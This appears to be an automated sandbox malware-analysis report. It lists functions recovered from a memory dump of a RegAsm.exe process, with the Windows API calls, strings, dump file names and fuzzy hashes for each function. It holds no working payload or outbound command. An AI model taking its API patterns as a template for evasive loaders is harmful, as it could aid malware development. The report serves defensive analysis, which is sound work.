Instruction Fuzzy Hash: 1E419171E01219EFDF18DFA9D890BDEB7F6EF88314F14812AE515A7704DB30A8458BA4

Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,74DE83C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C

Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942

Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4

Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00401474

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction ID: b0d32a7bd978dbc9842abeebd7712166406d741a383243a14520f93e3bb00ea5
Opcode Fuzzy Hash: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction Fuzzy Hash: 23E01271640304F7EF109BA0DD0AF5F72AC9700749F201175A606E60E0D6B8DA009A69

Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649

Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919

Function 0040111D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Function 00418599 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 0041859A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0040148A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 004014A2 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,75AA5460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 6C0755F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C04E1A5), ref: 6C075606
LoadLibraryW.KERNEL32(gdi32,?,6C04E1A5), ref: 6C07560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C075633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C07563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C07566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C07567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C075696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C0756B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C0756CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C0756E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C0756FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C075716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C07572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C075748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C075761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C07577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C075793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C0757A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C0757BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C0757D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C0757EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C0757FF

Strings

FillRect, xrefs: 6C075729
CreateSolidBrush, xrefs: 6C0757E4
RegisterClassW, xrefs: 6C0756AC
GetSystemMetricsForDpi, xrefs: 6C075677
GetMonitorInfoW, xrefs: 6C0757A2
GetThreadDpiAwarenessContext, xrefs: 6C07562D
gdi32, xrefs: 6C07560A
ShowWindow, xrefs: 6C0756DE
LoadIconW, xrefs: 6C07575B
DeleteObject, xrefs: 6C0757F9
SetWindowLongPtrW, xrefs: 6C0757B7
GetDpiForWindow, xrefs: 6C075690
GetWindowDC, xrefs: 6C075710
MonitorFromWindow, xrefs: 6C07578D
EnableNonClientDpiScaling, xrefs: 6C075666
ReleaseDC, xrefs: 6C075742
CreateWindowExW, xrefs: 6C0756C5
AreDpiAwarenessContextsEqual, xrefs: 6C075637
SetWindowPos, xrefs: 6C0756F7
StretchDIBits, xrefs: 6C0757CC
user32, xrefs: 6C075601
LoadCursorW, xrefs: 6C075774

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 947dc0313ef472d672cac046651549ac94521432a33b409d6fbc1f6a38224e64
Instruction ID: 4c1d67e05ddbe68618159cfc63bff9da3e69a5f1b0383330bf4687ad1eaa05bd
Opcode Fuzzy Hash: 947dc0313ef472d672cac046651549ac94521432a33b409d6fbc1f6a38224e64
Instruction Fuzzy Hash: 1C5153747027069BEF249F358D44B6A3BFCBB16255710642DB916E2A52EF74CC018F74

Function 6C05CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C02582D), ref: 6C05CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C02582D), ref: 6C05CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C08FE98,?,?,?,?,?,6C02582D), ref: 6C05CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C02582D), ref: 6C05CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C02582D), ref: 6C05CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C02582D), ref: 6C05CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C02582D), ref: 6C05CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C05CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C05CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C05CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C05CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C05CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C05CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C05CD98
